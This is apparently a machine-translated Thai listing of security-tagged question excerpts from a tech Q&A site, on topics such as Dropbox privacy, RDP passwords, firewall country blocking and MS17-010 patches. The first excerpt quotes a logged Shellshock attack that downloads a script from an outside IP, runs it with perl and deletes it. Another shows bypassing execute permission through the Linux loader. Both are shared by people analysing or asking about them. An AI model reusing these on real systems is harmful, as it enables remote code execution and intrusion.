คำถามติดแท็ก security

เห็นสิ่งนี้ในaccess.logเซิร์ฟเวอร์ทดสอบของฉัน: > 173.45.100.18 - - [26/Sep/2014:07:09:53 +0200] "GET /cgi-bin/hi HTTP/1.0" 404 490 "-" "() { :;}; /bin/bash -c \"cd /tmp;wget > http://213.5.67.223/ji;curl -O /tmp/ji http://213.5.67.223/jurat ; > perl /tmp/ji;rm -rf /tmp/ji;rm -rf /tmp/ji*\"" ไม่มีที่อยู่ใดที่เกี่ยวข้องกับฉันหรือช่วง IP ของเรา (หรือสิ่งอื่นใดสำหรับเรื่องนั้น) กำลังคิดในทันทีเกี่ยวกับข้อบกพร่องด้านความปลอดภัยของ Shellshock / "bashdoor" มันจริงดูเหมือนว่ามีคนได้พยายามที่จะcurl"บางอย่าง" ลงไปยังเซิร์ฟเวอร์แล้วดำเนินการที่ว่า "อะไร" และหลังจากนั้นลบ "อะไร" -rfกับ นี่คือเซิร์ฟเวอร์ทดสอบบริสุทธิ์ไม่มีอันตรายใด ๆ เกิดขึ้น …

23 security  shell-script  webserver 

ในขณะที่อ่านสิ่งนี้ฉันพบการใช้ประโยชน์ดังต่อไปนี้: % cp /usr/bin/id ~ % chmod -x ~/id % ls -al ~/id -rw-r--r-- 1 edd edd 22020 2012-08-01 15:06 /home/edd/id % ~/id zsh: permission denied: /home/edd/id % /lib/ld-linux.so.2 ~/id uid=1001(edd) gid=1001(edd) groups=1001(edd),1002(wheel) ตัวอย่างนี้แสดงให้เห็นว่าเราสามารถก้าวเท้าเลี่ยงการดำเนินการของระบบไฟล์ได้ในฐานะผู้ใช้ที่ไม่มีสิทธิพิเศษ ฉันทำสิ่งนี้บน Ubuntu 12.04 ในขณะที่ตัวโหลด Linux เป็นวัตถุที่ใช้ร่วมกันตามไฟล์ (1) แต่ก็มีจุดเข้าใช้งานที่อนุญาตให้เรียกใช้โดยตรง เมื่อดำเนินการในลักษณะนี้ตัวโหลด Linux ทำหน้าที่เป็นล่ามสำหรับ ELF ไบนารี อย่างไรก็ตามในเครื่อง OpenBSD ของฉันการหาประโยชน์นี้ไม่ได้มีประสิทธิภาพเพราะคุณไม่สามารถเรียกใช้ตัวโหลดเป็นโปรแกรม …

23 linux  security  file-permissions  shared-libraries 

ฉันจะไม่เชื่อถือ Dropbox ด้วยรายละเอียดธนาคารของฉันและเช่นนั้น (เพราะมีคนจำนวนมากที่กำลังมองหาข้อมูลประเภทนั้น) แต่ปลอดภัยหรือไม่ที่จะรักษาสิ่งต่าง ๆ ซึ่งอาจเป็นประโยชน์ต่อคนจำนวนน้อย เช่นข้อมูลที่ละเอียดอ่อนทางการค้า, ร่างเอกสารทางวิทยาศาสตร์, แผ่นคำตอบสำหรับการประเมินผลมหาวิทยาลัยฉันติวเตอร์เป็นต้น มีอะไรที่เกี่ยวข้องในการพิมพ์อย่างละเอียดเกี่ยวกับความเป็นส่วนตัวหรือความเป็นเจ้าของในข้อมูลที่จัดเก็บซึ่งฉันอาจพลาดหรือไม่? ตราบใดที่ฉันมีรหัสผ่านที่คาดเดายากพอสมควรมีแนวโน้มว่าคนที่รู้จักที่อยู่อีเมลของฉันจะสามารถแฮ็คข้อมูลได้

23 security  dropbox  privacy 

ฉันชอบโปรแกรมเสริม HTTPS นี้ทุกที่สำหรับ Firefox แต่ฉันมักจะเบราว์เซอร์ hop ดังนั้นจึงมีโปรแกรมเสริมที่เลือก HTTPS ที่คล้ายกันออกวางจำหน่ายสำหรับเบราว์เซอร์หลักอื่น ๆ

23 security  browser  browser-addons  ssl  https 

เดสก์ท็อประยะไกลที่บันทึกไว้มีความปลอดภัย (พูดอย่างหลวม ๆ ) บนเครื่องท้องถิ่นหรือไม่ อย่างน้อยพวกเขาจะไม่ถูกจัดเก็บเป็นข้อความที่ชัดเจนหรือไม่ แก้ไข: ฉันเข้าใจความเสี่ยงโดยธรรมชาติของการบันทึกรหัสผ่าน แน่นอนว่ามีคลื่นความถี่ของประสิทธิภาพตัวอย่างเช่นการบันทึกรหัสผ่านผ่านสิ่งที่ชอบCryptProtectData( สิ่งที่ Google Chrome ใช้กับ Win32 ) จะดีกว่าการบันทึกรหัสผ่านในข้อความที่ชัดเจน

23 windows-7  security  remote-desktop  passwords 

จากการโจมตีของ Man-in-the-Middle เมื่อเร็ว ๆ นี้ฉันให้ความสนใจกับคำเตือนที่ฉันได้รับเมื่อเชื่อมต่อกับเซิร์ฟเวอร์: เลือกดูใบรับรองฉันจะตรวจสอบSHA1 รหัสประจำตัว : ออกให้ : corsair ออกโดย : corsair เริ่มวันที่ : 9/5/2013 ถึง 3/7/2014 Thumbprint (SHA1):‎e9 c5 d7 17 95 95 fd ba 09 88 37 d8 9f 49 5e b8 02 ac 2b e2 และตรวจสอบให้แน่ใจว่าตรงกับอะไรบนเซิร์ฟเวอร์ ฉันเชื่อมต่อแล้วใช้certmgr.mscค้นหาใบรับรอง (เช่น"ออกให้กับโจรสลัด" ): มีเพียงคนเดียวในเครื่อง แต่เดี๋ยวก่อนนั่นไม่ใช่กุญแจสำคัญเดียวกัน: ใบรับรองที่ฉันแสดงผ่าน RDP นั้นแตกต่างจากใบรับรองบนเซิร์ฟเวอร์: ออกให้ …

23 security  remote-desktop  certificate  windows-server-2012 

อะไรที่เทียบเท่าntrights.exeกับ Windows 7? ฉันต้องการมันเพื่อให้สามารถเรียกใช้จากบรรทัดคำสั่ง

23 windows-7  command-line  security 

ปิด. คำถามนี้เป็นคำถามปิดหัวข้อ ไม่ยอมรับคำตอบในขณะนี้ ต้องการปรับปรุงคำถามนี้หรือไม่ อัปเดตคำถามเพื่อให้เป็นหัวข้อสำหรับผู้ใช้ขั้นสูง ปิดให้บริการใน4 ปีที่แล้ว มีผู้จัดการรหัสผ่านที่ฉันสามารถใช้กับคอมพิวเตอร์หลายเครื่องได้หรือไม่เพื่อจดจำรหัสผ่านทั้งหมดที่ฉันใช้ในเว็บไซต์ที่ฉันเข้าชม

23 security  sync  passwords  password-management 

ปิด คำถามนี้จะต้องมีมากขึ้นมุ่งเน้น ไม่ยอมรับคำตอบในขณะนี้ ต้องการปรับปรุงคำถามนี้หรือไม่ อัปเดตคำถามเพื่อให้มุ่งเน้นที่ปัญหาเดียวโดยแก้ไขโพสต์นี้ ปิดให้บริการใน2 ปีที่ผ่านมา เมื่อเร็ว ๆ นี้ในปีที่แล้วฉันสังเกตเห็นว่าการเข้าถึงไซต์บางประเภทยากขึ้นโดยเฉพาะอย่างยิ่งในประเทศที่ไม่เป็นที่นิยมเช่นอิหร่านหรือรัสเซีย ตัวอย่างเช่นตอนนี้ฉันพยายามเข้าถึงเว็บไซต์ของกระทรวงกลาโหมรัสเซีย ( http://eng.mil.ru/en/index.htm ) เว็บไซต์ที่ฉันมีเหตุผลทางธุรกิจที่เกี่ยวข้องกับการเยี่ยมชมและ มันหมดเวลาแล้ว ฉันลองไซต์เดียวกันผ่านทางพร็อกซียุโรปและไม่มีปัญหาในการเชื่อมต่อ จากนั้นฉันก็ลอง tracert และนี่คือผลลัพธ์: การตีความของฉันคือว่า IP ของ บริษัท ไฟร์วอลล์ถูกบล็อก ฉันถามแผนกไอทีของเราว่านโยบายการบล็อก IP สำหรับเครือข่ายคืออะไรและได้รับแจ้งว่า บริษัท ของเราไม่ได้กำหนดนโยบายนี้ แต่โดยผู้ให้บริการไฟร์วอลล์และเป็น "ความลับและกรรมสิทธิ์" แก่ผู้ให้บริการและพวกเขา (หมายถึง ไอที) ไม่มีอำนาจควบคุมนโยบายดังกล่าว เรื่องราวของที่นี่คืออะไร? ผู้จำหน่ายผลิตภัณฑ์ไฟร์วอลล์เป็นเพียงการปิดกั้นทั้งประเทศหรือไม่ เพียงแค่หัวเราะคิกคักฉันตัดสินใจที่จะลองประเทศต่าง ๆ เพื่อดูว่าจะเกิดอะไรขึ้น: Finland ok Poland ok Russia blocked Ukraine blocked Estonia …

22 networking  security  firewall 

ระบุว่าการหาประโยชน์จาก WansCry ransomware เกิดขึ้นฉันต้องการตรวจสอบว่าคอมพิวเตอร์ของฉันมีการอัปเดตความปลอดภัยโดยเฉพาะที่ควรหยุดช่องโหว่หรือไม่ - MS17-010 เห็นได้ชัดว่าฉันเข้าใจช่องโหว่และเป็นช่องโหว่ที่ถูกต้อง เราจะตรวจสอบรายละเอียดนั้นได้อย่างไร? ไมโครซอฟท์พยายามที่จะให้รายละเอียดบางอย่าง แต่มันไม่มีความหมายกับคนที่ไม่ได้เป็นอย่างดีมีประสบการณ์กับรีจิสทรีคีย์ (ฉันคิดว่าฉันสัมผัสพวกเขาอีกครั้งก่อนที่จะขุดออกกลับไวรัสปากแข็งเมื่อ XP ก็ยังคงเป็นสิ่งที่ -. ที่มัน) อื่น ๆการค้นหาให้เบาะแสบางคนเชื่อว่า ตัวเลือกบรรทัดคำสั่ง แต่มันไม่ได้ล้างทั้งหมดและฉันไม่ชอบใช้คำสั่งที่ฉันไม่เข้าใจ

22 windows  windows-10  security  wannacrypt 

นี่คือสิ่งที่ฉันสงสัยมานาน ถ้าฉันใช้ Gmail ผ่าน https จะมีใครสามารถอ่านการสนทนา IM และอีเมลของฉันได้หรือไม่หากฉันใช้เครือข่ายไร้สายที่ไม่มีหลักประกัน ฉันคิดว่าข้อมูลจะปลอดภัยเนื่องจากใช้การเชื่อมต่อแบบเข้ารหัส มีอะไรให้พิจารณาอีกไหม?

21 wireless-networking  security  encryption 

ตัวเลือกที่มีสำหรับการป้องกันรหัสผ่านของโฟลเดอร์มีอะไรบ้าง ฉันกำลังพูดถึงการกำหนดรหัสผ่านเพื่อเข้าถึงโฟลเดอร์ไม่ใช่แค่สิทธิ์การเข้าถึงของผู้ใช้ ซอฟต์แวร์บุคคลที่สามมีความปลอดภัยและมั่นคงหรือไม่ คำแนะนำคืออะไร

21 windows  security  passwords  file-permissions 

มีผู้ให้บริการหลายรายที่อนุญาตให้ผู้ใช้หลีกเลี่ยงไฟร์วอลล์หรือปิดบังการเข้าถึงเว็บของตน บางคนใช้พร็อกซี่บางคนใช้ VPN คนส่วนใหญ่บอกว่า VPN มักจะทำงานได้ดีกว่าพร็อกซี พวกเขามักจะมีราคาแพงกว่า ตัวอย่างเช่นพร็อกซีจะอนุญาตให้ผู้ใช้ระหว่างประเทศเข้าถึง Pandora.com แต่ไม่ใช่ Hulu.com VPN จะทำงานทั้งสองอย่าง พร็อกซีทำงานอย่างไรแตกต่างจาก VPN และทำไมจึงสร้างความแตกต่าง

21 security  vpn  proxy 

นอกเหนือจากคำถามย้ำสองเทคโนโลยีเข้ากันได้หรือไม่ ถ้าเป็นเช่นนั้นภายใต้สถานการณ์ใด? สิ่งที่เป็นประโยชน์ญาติของทั้งสองเทคโนโลยีคืออะไร?

20 email  security  encryption  gnupg  pgp 

หากบัญชีของฉันเป็นสมาชิกของกลุ่มผู้ดูแลระบบอยู่แล้วเหตุใดบางฟังก์ชั่นใน Windows 7 ทำให้ฉันต้องเรียกใช้พวกเขาเป็นผู้ดูแลระบบ ฉันคิดว่ามันเกี่ยวกับอะไร

20 windows-7  security  administrator